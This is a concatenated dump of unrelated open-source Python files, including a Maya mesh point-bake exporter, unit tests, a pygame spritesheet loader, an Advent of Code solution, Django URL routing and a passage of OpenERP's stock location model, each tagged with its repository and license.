MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import maya.OpenMaya as OM
import maya.OpenMayaAnim as OMA
import maya.OpenMayaMPx as OMX
import maya.cmds as cmds
import sys, math
########################################################################################################################
## @brief simple function to write data out with tabs for a well formatted xml file
## @param[in] _file the file pointer to write data too
## @param[in] _nTabs number of tabs to write before the data
## @param[in] _data the actual data to write out to the file
########################################################################################################################
def WriteData(_file,_nTabs,_data) :
for i in range(0,_nTabs) :
_file.write("\t")
_file.write(_data)
_file.write("\n")
########################################################################################################################
## @brief function to extract and write out the xml data to a file, we don't use any XML
## lib so there is no real check for correct formatting of the data, be carful!
## @param[in] _fileName the file name to open
## @param[in] _name name of the mesh selected
## @param[in] _startFrame the start frame for the export
## @param[in] _endFrame the end frame for the export
########################################################################################################################
def NCCAPointBake(_fileName,_name,_startFrame,_endFrame) :
# grab the selected object
selected = OM.MSelectionList()
obj=OM.MObject( )
selected.add(_name)
selected.getDependNode(0,obj)
# get the parent transform
fn = OM.MFnTransform(obj)
Mesh=""
oChild = fn.child(0)
# check to see if what we have is a mesh
if(oChild.apiTypeStr()=="kMesh") :
print "got Mesh"
# get our mesh
Mesh=OM.MFnMesh(oChild)
else :
print "Didn't get mesh ", oChild.apiType()
return
# now we try and open the file for writing
try :
file=open(str(_fileName[0]),'w')
# if this fails catch the error and exit
except IOError :
print "Error opening file",str(_fileName)
return
# set the frame to start
print "PB get anim control"
currFrame=OM.MTime()
anim=OMA.MAnimControl()
# as these can take time to process we have an interupter to allow for the process to be
# stopped
interupter=OM.MComputation()
# set the start of the heavy computation
interupter.beginComputation()
# now we set the tab level to 0 for the initial write to the file
tabIndent=0
# now we get the mesh number of points
numPoints = cmds.polyEvaluate( _name, v=True)
# write the xml headers
file.write("<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n")
file.write("<NCCAPointBake>\n")
# up the tab level
tabIndent=tabIndent+1
# write the initial header data
WriteData(file,tabIndent,"<MeshName> %s </MeshName>" %(_name))
WriteData(file,tabIndent,"<NumVerts> %d </NumVerts>" %(numPoints))
WriteData(file,tabIndent,"<StartFrame> %s </StartFrame>" %(_startFrame))
WriteData(file,tabIndent,"<EndFrame> %s </EndFrame>" %(_endFrame))
WriteData(file,tabIndent,"<NumFrames> %s </NumFrames>" %(_endFrame-_startFrame))
WriteData(file,tabIndent,"<TranslateMode> %s </TranslateMode>" %("absolute"))
# now for every frame write out the vertex data
for frame in range(_startFrame,_endFrame) :
print "Doing frame %04d" %(frame)
# move to the correct frame
currFrame.setValue (frame)
anim.setCurrentTime(currFrame)
# write out the frame tag
WriteData(file,tabIndent,"<Frame number=\"%d\">" %(frame))
tabIndent=tabIndent+1
for vertex in range(0,numPoints) :
# now the actual vertex data for the current mesh index value
data = cmds.xform( (_name+ ".vtx["+str(vertex)+"]"), q=True, ws=True, t=True )
WriteData(file,tabIndent,"<Vertex number=\"%d\" attrib=\"translate\"> %f %f %f </Vertex>" %(vertex,data[0],data[1],data[2]))
# now un-indent as we have ended the frame
tabIndent=tabIndent-1
WriteData(file,tabIndent,"</Frame>")
# if we have interupted exit and finish
if interupter.isInterruptRequested() :
file.write("</NCCAPointBake>\n")
file.close()
print "File export interrupted ";
return
# now finish
file.write("</NCCAPointBake>\n")
# and close the file
file.close()
########################################################################################################################
## @brief actual function call used to do the import
########################################################################################################################
class PointBakeExport() :
########################################################################################################################
# @brief ctor
########################################################################################################################
def __init__(self) :
# get the currently selected objects and make sure we have only one object
selected = OM.MSelectionList()
OM.MGlobal.getActiveSelectionList(selected)
self.selectedObjects = []
selected.getSelectionStrings(self.selectedObjects)
if len(self.selectedObjects) == 0 :
cmds.confirmDialog( title='No objects Selected', message='Select a Mesh Object', button=['Ok'], defaultButton='Ok', cancelButton='Ok', dismissString='Ok' )
elif len(self.selectedObjects) > 1 :
cmds.confirmDialog( title='Select One Object', message='Only One Mesh mat be exported at a time', button=['Ok'], defaultButton='Ok', cancelButton='Ok', dismissString='Ok' )
# now we have the correct criteria we can proceed with the export
else :
# get the start and end values for our UI sliders
anim=OMA.MAnimControl()
minTime=anim.minTime()
maxTime=anim.maxTime()
self.m_start=int(minTime.value())
self.m_end=int(maxTime.value())
# now we create a window ready to populate the components
self.m_window = cmds.window( title='NCCA Pointbake Export' )
# create a layout
cmds.columnLayout()
# create two sliders for start and end we also attach methods to be called when the slider
# changes
self.m_startSlider=cmds.intSliderGrp( changeCommand=self.startChanged,field=True, label='Start Frame', minValue=self.m_start, maxValue=self.m_end, fieldMinValue=self.m_start, fieldMaxValue=self.m_end, value=self.m_start )
self.m_endSlider=cmds.intSliderGrp( changeCommand=self.endChanged ,field=True, label='End Frame', minValue=self.m_start, maxValue=self.m_end, fieldMinValue=self.m_end, fieldMaxValue=self.m_end, value=self.m_end )
# create a button and add the method called when pressed
cmds.button( label='Export', command=self.export )
# finally show the window
cmds.showWindow( self.m_window )
########################################################################################################################
# @brief export method attached ot the button, this will be executed once every time
# the button is pressed
# @param *args the arguments passed from the button
########################################################################################################################
def export(self,*args) :
# get the file name to save too
basicFilter = "*.xml"
file=cmds.fileDialog2(caption="Please select file to save",fileFilter=basicFilter, dialogStyle=2)
# check we get a filename and then save
if file !="" :
if self.m_start >= self.m_end :
cmds.confirmDialog( title='Range Error', message='start >= end', button=['Ok'], defaultButton='Ok', cancelButton='Ok', dismissString='Ok' )
else :
NCCAPointBake(file,self.selectedObjects[0],self.m_start,self.m_end)
# finally remove the export window
cmds.deleteUI( self.m_window, window=True )
########################################################################################################################
# @brief this is called every time the slider is changed (i.e. a new value)
# @param *args the arguments passed from the button [0] is the numeric value
########################################################################################################################
def startChanged(self, *args) :
self.m_start=args[0]
########################################################################################################################
# @brief this is called every time the slider is changed (i.e. a new value)
# @param *args the arguments passed from the button [0] is the numeric value
########################################################################################################################
def endChanged(self, *args) :
self.m_end=args[0]
| NCCA/NGL6Demos | PointBake/ImportExportScripts/NCCAPointBakeMayaExport.py | Python | gpl-2.0 | 9,250 |
import unittest
from checkQC.handlers.cluster_pf_handler import ClusterPFHandler
from tests.test_utils import get_stats_json
from tests.handlers.handler_test_base import HandlerTestBase
class TestClusterPFHandler(HandlerTestBase):
def setUp(self):
key = "ConversionResults"
qc_config = {'name': 'TotalClustersPF', 'error': '50', 'warning': '110'}
value = get_stats_json()["ConversionResults"]
cluster_pf_handler = ClusterPFHandler(qc_config)
cluster_pf_handler.collect((key, value))
self.cluster_pf_handler = cluster_pf_handler
def set_qc_config(self, qc_config):
self.cluster_pf_handler.qc_config = qc_config
def test_all_is_fine(self):
qc_config = {'name': 'TotalClustersPF', 'error': 'unknown', 'warning': '110'}
self.set_qc_config(qc_config)
errors_and_warnings = list(self.cluster_pf_handler.check_qc())
self.assertEqual(errors_and_warnings, [])
def test_warning(self):
qc_config = {'name': 'TotalClustersPF', 'error': '100', 'warning': '170'}
self.set_qc_config(qc_config)
errors_and_warnings = list(self.cluster_pf_handler.check_qc())
self.assertEqual(len(errors_and_warnings), 2)
class_names = self.map_errors_and_warnings_to_class_names(errors_and_warnings)
self.assertListEqual(class_names, ['QCErrorWarning', 'QCErrorWarning'])
def test_error(self):
qc_config = {'name': 'TotalClustersPF', 'error': '170', 'warning': '180'}
self.set_qc_config(qc_config)
errors_and_warnings = list(self.cluster_pf_handler.check_qc())
self.assertEqual(len(errors_and_warnings), 2)
class_names = self.map_errors_and_warnings_to_class_names(errors_and_warnings)
self.assertListEqual(class_names, ['QCErrorFatal', 'QCErrorFatal'])
def test_warning_when_error_unknown(self):
qc_config = {'name': 'TotalClustersPF', 'error': 'unknown', 'warning': '170'}
self.set_qc_config(qc_config)
errors_and_warnings = list(self.cluster_pf_handler.check_qc())
self.assertEqual(len(errors_and_warnings), 2)
class_names = self.map_errors_and_warnings_to_class_names(errors_and_warnings)
self.assertListEqual(class_names, ['QCErrorWarning', 'QCErrorWarning'])
if __name__ == '__main__':
unittest.main()
| monikaBrandt/checkQC | tests/handlers/test_cluster_pf_handler.py | Python | gpl-3.0 | 2,350 |
"""
Template for Characters
Copy this module up one level and name it as you like, then
use it as a template to create your own Character class.
To make new logins default to creating characters
of your new type, change settings.BASE_CHARACTER_TYPECLASS to point to
your new class, e.g.
settings.BASE_CHARACTER_TYPECLASS = "game.gamesrc.objects.mychar.MyChar"
Note that objects already created in the database will not notice
this change, you have to convert them manually e.g. with the
@typeclass command.
"""
from ev import Character
class ExampleCharacter(Character):
"""
The Character is like any normal Object (see example/object.py for
a list of properties and methods), except it actually implements
some of its hook methods to do some work:
at_basetype_setup - always assigns the default_cmdset to this object type
(important!)sets locks so character cannot be picked up
and its commands only be called by itself, not anyone else.
(to change things, use at_object_creation() instead)
at_after_move - launches the "look" command
at_disconnect - stores the current location, so the "unconnected" character
object does not need to stay on grid but can be given a
None-location while offline.
at_post_login - retrieves the character's old location and puts it back
on the grid with a "charname has connected" message echoed
to the room
"""
pass
| YourCyborg/Sun-RPI | game/gamesrc/objects/examples/character.py | Python | bsd-3-clause | 1,578 |
#!/usr/bin/env python
"""
http://adventofcode.com/day/24
Part 1
------
It's Christmas Eve, and Santa is loading up the sleigh for this year's
deliveries. However, there's one small problem: he can't get the sleigh
to balance. If it isn't balanced, he can't defy physics, and nobody gets
presents this year.
No pressure.
Santa has provided you a list of the weights of every package he needs
to fit on the sleigh. The packages need to be split into three groups
of exactly the same weight, and every package has to fit. The first group
goes in the passenger compartment of the sleigh, and the second and third
go in containers on either side. Only when all three groups weigh exactly
the same amount will the sleigh be able to fly. Defying physics has rules,
you know!
Of course, that's not the only problem. The first group - the one going in
the passenger compartment - needs as few packages as possible so that Santa
has some legroom left over. It doesn't matter how many packages are in either
of the other two groups, so long as all of the groups weigh the same.
Furthermore, Santa tells you, if there are multiple ways to arrange the
packages such that the fewest possible are in the first group, you need to
choose the way where the first group has the smallest quantum entanglement
to reduce the chance of any "complications". The quantum entanglement of
a group of packages is the product of their weights, that is, the value you
get when you multiply their weights together. Only consider quantum
entanglement if the first group has the fewest possible number of packages
in it and all groups weigh the same amount.
For example, suppose you have ten packages with weights 1 through 5 and 7
through 11. For this situation, the unique first groups, their quantum
entanglements, and a way to divide the remaining packages are as follows:
Group 1; Group 2; Group 3
11 9 (QE= 99); 10 8 2; 7 5 4 3 1
10 9 1 (QE= 90); 11 7 2; 8 5 4 3
10 8 2 (QE=160); 11 9; 7 5 4 3 1
10 7 3 (QE=210); 11 9; 8 5 4 2 1
10 5 4 1 (QE=200); 11 9; 8 7 3 2
10 5 3 2 (QE=300); 11 9; 8 7 4 1
10 4 3 2 1 (QE=240); 11 9; 8 7 5
9 8 3 (QE=216); 11 7 2; 10 5 4 1
9 7 4 (QE=252); 11 8 1; 10 5 3 2
9 5 4 2 (QE=360); 11 8 1; 10 7 3
8 7 5 (QE=280); 11 9; 10 4 3 2 1
8 5 4 3 (QE=480); 11 9; 10 7 2 1
7 5 4 3 1 (QE=420); 11 9; 10 8 2
Of these, although 10 9 1 has the smallest quantum entanglement (90), the
configuration with only two packages, 11 9, in the passenger compartment
gives Santa the most legroom and wins. In this situation, the quantum
entanglement for the ideal configuration is therefore 99. Had there been
two configurations with only two packages in the first group, the one with
the smaller quantum entanglement would be chosen.
What is the quantum entanglement of the first group of packages in the
ideal configuration?
Part 2
------
"""
from __future__ import print_function, unicode_literals
from functools import reduce
from itertools import combinations
from operator import mul
import os
import sys
INFILE = 'inputs/input24.txt'
def find(weights, group_count):
total = sum(weights)
for i in range(len(weights)):
qe_list = [reduce(mul, c) for c in combinations(weights, i)
if sum(c) == total]
if qe_list:
return min(qe_list)
def main():
weights = list()
options = list()
with open(INFILE) as f:
for line in f:
weights.append(int(line.strip()))
# Part 1
for p in []: # permutations(weights):
for i in range(len(weights)):
for j in range(len(weights) - i):
k = len(weights) - i - j
all_positive = i > 0 and j > 0 and k > 0
all_included = i + j + k == len(weights)
if all_positive and all_included:
group1 = weights[:i]
group2 = weights[i+1:i+j]
group3 = weights[i+j+1:]
if sum(group1) == sum(group2) == sum(group3):
print('> match! {} {} {} / {} {} {} / {} {} {}'.format(i, j, k, len(group1), len(group2), len(group3), sum(group1), sum(group2), sum(group3)))
#print('{} j={} j={} k={}'.format(len(weights), i, j, k))
#print(' {}/{}/{}'.format(len(group1), len(group2), len(group3)))
# Part 1
msg = '[Python] Puzzle 24-1: {}'
print(msg.format(find(weights, 3)))
# Part 2
msg = '[Python] Puzzle 24-2: {}'
print(msg.format(find(weights, 4)))
if __name__ == '__main__':
main()
| rnelson/adventofcode | advent2015/partial_day24.py | Python | mit | 4,689 |
# Pygame spritesheet example
# Licensed under LGPLv3
# This class handles sprite sheets
# This was taken from www.scriptefun.com/transcript-2-using
# sprite-sheets-and-drawing-the-background
# I've added some code to fail if the file wasn't found..
# Note: When calling images_at the rect is the format:
# (x, y, x + offset, y + offset)
# File based in Source: http://www.pygame.org/wiki/Spritesheet?parent=CookBook
import pygame
from constants import PERSONA_SIZE
class SpriteSheet(object):
def __init__(self, filename):
try:
self.sheet = pygame.image.load(filename).convert()
except pygame.error, message:
print 'Unable to load spritesheet image:', filename
raise SystemExit, message
# Load a specific image from a specific rectangle
def image_at(self, rectangle, colorkey = None, resize=True):
"Loads image from x,y,x+offset,y+offset"
rect = pygame.Rect(rectangle)
image = pygame.Surface(rect.size).convert()
image.blit(self.sheet, (0, 0), rect)
if colorkey is not None:
if colorkey is -1:
colorkey = image.get_at((0,0))
image.set_colorkey(colorkey, pygame.RLEACCEL)
# fits sprite to square size
if resize:
rect.fit((rect.x, rect.y), PERSONA_SIZE)
return pygame.transform.smoothscale(image, PERSONA_SIZE)
else:
return image
# Load a whole bunch of images and return them as a list
def images_at(self, rects, colorkey = None):
"Loads multiple images, supply a list of coordinates"
return [self.image_at(rect, colorkey) for rect in rects]
# Load a whole strip of images
def load_strip(self, rect, image_count, colorkey = None):
"Loads a strip of images and returns them as a list"
tups = [(rect[0]+rect[2]*x, rect[1], rect[2], rect[3])
for x in range(image_count)]
return self.images_at(tups, colorkey)
class BaseAnimation(object):
"""sprite strip animator
This class provides an iterator (iter() and next() methods), and a
__add__() method for joining strips which comes in handy when a
strip wraps to the next row.
"""
def __init__(self, images, loop=False, frames=1):
"""
BaseAnimation class
Receives an array and iterates it considering the frame rate
and loop
loop is a boolean that, when True, causes the next() method to
loop. If False, the terminal case raises StopIteration.
frames is the number of ticks to return the same image before
the iterator advances to the next image.
"""
self.i = 0
self.loop = loop
self.frames = frames
self.f = frames
self.images = images
def iter(self):
self.i = 0
self.f = self.frames
return self
def next(self):
if self.i >= len(self.images):
if not self.loop:
raise StopIteration
else:
self.i = 0
image = self.images[self.i]
self.f -= 1
if self.f == 0:
self.i += 1
self.f = self.frames
return image
def start(self):
pass
def stop(self):
pass
def __add__(self, ss):
self.images.extend(ss.images)
return self
class SpriteStripAnim(BaseAnimation):
"""sprite strip animator"""
def __init__(self, filename, rect, count, colorkey=None,
loop=False, frames=1):
"""construct a SpriteStripAnim
filename, rect, count, and colorkey are the same arguments used
by spritesheet.load_strip.
"""
self.filename = filename
ss = SpriteSheet(filename)
self.images = ss.load_strip(rect, count, colorkey)
super(SpriteStripAnim, self).__init__(self.images, loop, frames)
| adalbas/sfgame | sfgame/game/spritesheet.py | Python | apache-2.0 | 4,014 |
"""cl.utils"""
from __future__ import absolute_import
import operator
from importlib import import_module
from itertools import imap, ifilter
from kombu.utils import cached_property # noqa
__all__ = ["force_list", "flatten", "get_cls_by_name",
"instantiate", "cached_property"]
def force_list(obj):
if not hasattr(obj, "__iter__"):
return [obj]
return obj
def flatten(it):
if it:
try:
return reduce(operator.add,
imap(force_list, ifilter(None, it)))
except TypeError:
return []
return it
def first(it, default=None):
try:
it.next()
except StopIteration:
return default
def first_or_raise(it, exc):
for reply in it:
if not isinstance(reply, Exception):
return reply
raise exc
def get_cls_by_name(name, aliases={}, imp=None):
"""Get class by name.
The name should be the full dot-separated path to the class::
modulename.ClassName
Example::
celery.concurrency.processes.TaskPool
^- class name
If `aliases` is provided, a dict containing short name/long name
mappings, the name is looked up in the aliases first.
Examples:
>>> get_cls_by_name("celery.concurrency.processes.TaskPool")
<class 'celery.concurrency.processes.TaskPool'>
>>> get_cls_by_name("default", {
... "default": "celery.concurrency.processes.TaskPool"})
<class 'celery.concurrency.processes.TaskPool'>
# Does not try to look up non-string names.
>>> from celery.concurrency.processes import TaskPool
>>> get_cls_by_name(TaskPool) is TaskPool
True
"""
if imp is None:
imp = import_module
if not isinstance(name, basestring):
return name # already a class
name = aliases.get(name) or name
module_name, _, cls_name = name.rpartition(".")
try:
module = imp(module_name)
except ValueError, exc:
raise ValueError("Couldn't import %r: %s" % (name, exc))
return getattr(module, cls_name)
def instantiate(name, *args, **kwargs):
"""Instantiate class by name.
See :func:`get_cls_by_name`.
"""
return get_cls_by_name(name)(*args, **kwargs)
def abbr(S, max, ellipsis="..."):
if S and len(S) > max:
return ellipsis and (S[:max - len(ellipsis)] + ellipsis) or S[:max]
return S
def shortuuid(u):
if '-' in u:
return u[:u.index('-')]
return abbr(u, 16)
| pexip/os-python-cl | cl/utils/__init__.py | Python | bsd-3-clause | 2,587 |
"""ber_serkr URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
#from material.frontend import urls as frontend_urls
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include('hamask.urls')),
]
| rawenihcam/BER-SERKR | ber_serkr/urls.py | Python | mit | 867 |
#!/usr/bin/env python
from nose.tools import *
from nose import SkipTest
import networkx as nx
class TestFlowClosenessCentrality(object):
numpy=1 # nosetests attribute, use nosetests -a 'not numpy' to skip test
@classmethod
def setupClass(cls):
global np
try:
import numpy as np
import scipy
except ImportError:
raise SkipTest('NumPy not available.')
def test_K4(self):
"""Closeness centrality: K4"""
G=nx.complete_graph(4)
b=nx.current_flow_closeness_centrality(G)
b_answer={0: 2.0/3, 1: 2.0/3, 2: 2.0/3, 3: 2.0/3}
for n in sorted(G):
assert_almost_equal(b[n],b_answer[n])
def test_P4(self):
"""Closeness centrality: P4"""
G=nx.path_graph(4)
b=nx.current_flow_closeness_centrality(G)
b_answer={0: 1.0/6, 1: 1.0/4, 2: 1.0/4, 3:1.0/6}
for n in sorted(G):
assert_almost_equal(b[n],b_answer[n])
def test_star(self):
"""Closeness centrality: star """
G=nx.Graph()
nx.add_star(G, ['a', 'b', 'c', 'd'])
b=nx.current_flow_closeness_centrality(G)
b_answer={'a': 1.0/3, 'b': 0.6/3, 'c': 0.6/3, 'd':0.6/3}
for n in sorted(G):
assert_almost_equal(b[n],b_answer[n])
class TestWeightedFlowClosenessCentrality(object):
pass
| cmtm/networkx | networkx/algorithms/centrality/tests/test_current_flow_closeness.py | Python | bsd-3-clause | 1,387 |
# -*- coding: utf-8 -*-
#
# Copyright 2017 Ricequant, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
VALID_HISTORY_FIELDS = [
'datetime', 'open', 'close', 'high', 'low', 'total_turnover', 'volume',
'acc_net_value', 'discount_rate', 'unit_net_value',
'limit_up', 'limit_down', 'open_interest', 'basis_spread', 'settlement', 'prev_settlement'
]
VALID_GET_PRICE_FIELDS = [
'OpeningPx', 'ClosingPx', 'HighPx', 'LowPx', 'TotalTurnover', 'TotalVolumeTraded',
'AccNetValue', 'UnitNetValue', 'DiscountRate',
'SettlPx', 'PrevSettlPx', 'OpenInterest', 'BasisSpread', 'HighLimitPx', 'LowLimitPx'
]
VALID_TENORS = [
'0S', '1M', '2M', '3M', '6M', '9M', '1Y', '2Y', '3Y', '4Y',
'5Y', '6Y', '7Y', '8Y', '9Y', '10Y', '15Y', '20Y', '30Y',
'40Y', '50Y'
]
VALID_INSTRUMENT_TYPES = [
'CS', 'Future', 'INDX', 'ETF', 'LOF', 'SF', 'FenjiA', 'FenjiB', 'FenjiMu',
'Stock', 'Fund', 'Index'
]
VALID_XUEQIU_FIELDS = [
'new_comments', 'total_comments',
'new_followers', 'total_followers',
'sell_actions', 'buy_actions',
]
VALID_MARGIN_FIELDS = [
'margin_balance',
'buy_on_margin_value',
'short_sell_quantity',
'margin_repayment',
'short_balance_quantity',
'short_repayment_quantity',
'short_balance',
'total_balance'
]
VALID_SHARE_FIELDS = [
'total', 'circulation_a', 'management_circulation', 'non_circulation_a', 'total_a'
]
VALID_TURNOVER_FIELDS = (
'today',
'week',
'month',
'three_month',
'six_month',
'year',
'current_year',
'total',
)
| xclxxl414/rqalpha | rqalpha/api/names.py | Python | apache-2.0 | 2,048 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime
from dateutil.relativedelta import relativedelta
import time
from operator import itemgetter
from itertools import groupby
from openerp.osv import fields, osv, orm
from openerp.tools.translate import _
from openerp import netsvc
from openerp import tools
from openerp.tools import float_compare, DEFAULT_SERVER_DATETIME_FORMAT
import openerp.addons.decimal_precision as dp
import logging
_logger = logging.getLogger(__name__)
#----------------------------------------------------------
# Incoterms
#----------------------------------------------------------
class stock_incoterms(osv.osv):
_name = "stock.incoterms"
_description = "Incoterms"
_columns = {
'name': fields.char('Name', size=64, required=True, help="Incoterms are series of sales terms.They are used to divide transaction costs and responsibilities between buyer and seller and reflect state-of-the-art transportation practices."),
'code': fields.char('Code', size=3, required=True, help="Code for Incoterms"),
'active': fields.boolean('Active', help="By unchecking the active field, you may hide an INCOTERM without deleting it."),
}
_defaults = {
'active': True,
}
stock_incoterms()
class stock_journal(osv.osv):
_name = "stock.journal"
_description = "Stock Journal"
_columns = {
'name': fields.char('Stock Journal', size=32, required=True),
'user_id': fields.many2one('res.users', 'Responsible'),
}
_defaults = {
'user_id': lambda s, c, u, ctx: u
}
stock_journal()
#----------------------------------------------------------
# Stock Location
#----------------------------------------------------------
class stock_location(osv.osv):
_name = "stock.location"
_description = "Location"
_parent_name = "location_id"
_parent_store = True
_parent_order = 'posz,name'
_order = 'parent_left'
# TODO: implement name_search() in a way that matches the results of name_get!
def name_get(self, cr, uid, ids, context=None):
# always return the full hierarchical name
res = self._complete_name(cr, uid, ids, 'complete_name', None, context=context)
return res.items()
def _complete_name(self, cr, uid, ids, name, args, context=None):
""" Forms complete name of location from parent location to child location.
@return: Dictionary of values
"""
res = {}
for m in self.browse(cr, uid, ids, context=context):
names = [m.name]
parent = m.location_id
while parent:
names.append(parent.name)
parent = parent.location_id
res[m.id] = ' / '.join(reversed(names))
return res
def _get_sublocations(self, cr, uid, ids, context=None):
""" return all sublocations of the given stock locations (included) """
return self.search(cr, uid, [('id', 'child_of', ids)], context=context)
def _product_value(self, cr, uid, ids, field_names, arg, context=None):
"""Computes stock value (real and virtual) for a product, as well as stock qty (real and virtual).
@param field_names: Name of field
@return: Dictionary of values
"""
prod_id = context and context.get('product_id', False)
if not prod_id:
return dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])
product_product_obj = self.pool.get('product.product')
cr.execute('select distinct product_id, location_id from stock_move where location_id in %s', (tuple(ids), ))
dict1 = cr.dictfetchall()
cr.execute('select distinct product_id, location_dest_id as location_id from stock_move where location_dest_id in %s', (tuple(ids), ))
dict2 = cr.dictfetchall()
res_products_by_location = sorted(dict1+dict2, key=itemgetter('location_id'))
products_by_location = dict((k, [v['product_id'] for v in itr]) for k, itr in groupby(res_products_by_location, itemgetter('location_id')))
result = dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])
result.update(dict([(i, {}.fromkeys(field_names, 0.0)) for i in list(set([aaa['location_id'] for aaa in res_products_by_location]))]))
currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id
currency_obj = self.pool.get('res.currency')
currency = currency_obj.browse(cr, uid, currency_id, context=context)
for loc_id, product_ids in products_by_location.items():
if prod_id:
product_ids = [prod_id]
c = (context or {}).copy()
c['location'] = loc_id
for prod in product_product_obj.browse(cr, uid, product_ids, context=c):
for f in field_names:
if f == 'stock_real':
if loc_id not in result:
result[loc_id] = {}
result[loc_id][f] += prod.qty_available
elif f == 'stock_virtual':
result[loc_id][f] += prod.virtual_available
elif f == 'stock_real_value':
amount = prod.qty_available * prod.standard_price
amount = currency_obj.round(cr, uid, currency, amount)
result[loc_id][f] += amount
elif f == 'stock_virtual_value':
amount = prod.virtual_available * prod.standard_price
amount = currency_obj.round(cr, uid, currency, amount)
result[loc_id][f] += amount
return result
_columns = {
'name': fields.char('Location Name', size=64, required=True, translate=True),
'active': fields.boolean('Active', help="By unchecking the active field, you may hide a location without deleting it."),
'usage': fields.selection([('supplier', 'Supplier Location'), ('view', 'View'), ('internal', 'Internal Location'), ('customer', 'Customer Location'), ('inventory', 'Inventory'), ('procurement', 'Procurement'), ('production', 'Production'), ('transit', 'Transit Location for Inter-Companies Transfers')], 'Location Type', required=True,
help="""* Supplier Location: Virtual location representing the source location for products coming from your suppliers
\n* View: Virtual location used to create a hierarchical structures for your warehouse, aggregating its child locations ; can't directly contain products
\n* Internal Location: Physical locations inside your own warehouses,
\n* Customer Location: Virtual location representing the destination location for products sent to your customers
\n* Inventory: Virtual location serving as counterpart for inventory operations used to correct stock levels (Physical inventories)
\n* Procurement: Virtual location serving as temporary counterpart for procurement operations when the source (supplier or production) is not known yet. This location should be empty when the procurement scheduler has finished running.
\n* Production: Virtual counterpart location for production operations: this location consumes the raw material and produces finished products
""", select = True),
# temporarily removed, as it's unused: 'allocation_method': fields.selection([('fifo', 'FIFO'), ('lifo', 'LIFO'), ('nearest', 'Nearest')], 'Allocation Method', required=True),
'complete_name': fields.function(_complete_name, type='char', size=256, string="Location Name",
store={'stock.location': (_get_sublocations, ['name', 'location_id'], 10)}),
'stock_real': fields.function(_product_value, type='float', string='Real Stock', multi="stock"),
'stock_virtual': fields.function(_product_value, type='float', string='Virtual Stock', multi="stock"),
'location_id': fields.many2one('stock.location', 'Parent Location', select=True, ondelete='cascade'),
'child_ids': fields.one2many('stock.location', 'location_id', 'Contains'),
'chained_journal_id': fields.many2one('stock.journal', 'Chaining Journal',help="Inventory Journal in which the chained move will be written, if the Chaining Type is not Transparent (no journal is used if left empty)"),
'chained_location_id': fields.many2one('stock.location', 'Chained Location If Fixed'),
'chained_location_type': fields.selection([('none', 'None'), ('customer', 'Customer'), ('fixed', 'Fixed Location')],
'Chained Location Type', required=True,
help="Determines whether this location is chained to another location, i.e. any incoming product in this location \n" \
"should next go to the chained location. The chained location is determined according to the type :"\
"\n* None: No chaining at all"\
"\n* Customer: The chained location will be taken from the Customer Location field on the Partner form of the Partner that is specified in the Picking list of the incoming products." \
"\n* Fixed Location: The chained location is taken from the next field: Chained Location if Fixed." \
),
'chained_auto_packing': fields.selection(
[('auto', 'Automatic Move'), ('manual', 'Manual Operation'), ('transparent', 'Automatic No Step Added')],
'Chaining Type',
required=True,
help="This is used only if you select a chained location type.\n" \
"The 'Automatic Move' value will create a stock move after the current one that will be "\
"validated automatically. With 'Manual Operation', the stock move has to be validated "\
"by a worker. With 'Automatic No Step Added', the location is replaced in the original move."
),
'chained_picking_type': fields.selection([('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], 'Shipping Type', help="Shipping Type of the Picking List that will contain the chained move (leave empty to automatically detect the type based on the source and destination locations)."),
'chained_company_id': fields.many2one('res.company', 'Chained Company', help='The company the Picking List containing the chained move will belong to (leave empty to use the default company determination rules'),
'chained_delay': fields.integer('Chaining Lead Time',help="Delay between original move and chained move in days"),
'partner_id': fields.many2one('res.partner', 'Location Address',help="Address of customer or supplier."),
'icon': fields.selection(tools.icons, 'Icon', size=64,help="Icon show in hierarchical tree view"),
'comment': fields.text('Additional Information'),
'posx': fields.integer('Corridor (X)',help="Optional localization details, for information purpose only"),
'posy': fields.integer('Shelves (Y)', help="Optional localization details, for information purpose only"),
'posz': fields.integer('Height (Z)', help="Optional localization details, for information purpose only"),
'parent_left': fields.integer('Left Parent', select=1),
'parent_right': fields.integer('Right Parent', select=1),
'stock_real_value': fields.function(_product_value, type='float', string='Real Stock Value', multi="stock", digits_compute=dp.get_precision('Account')),
'stock_virtual_value': fields.function(_product_value, type='float', string='Virtual Stock Value', multi="stock", digits_compute=dp.get_precision('Account')),
'company_id': fields.many2one('res.company', 'Company', select=1, help='Let this field empty if this location is shared between all companies'),
'scrap_location': fields.boolean('Scrap Location', help='Check this box to allow using this location to put scrapped/damaged goods.'),
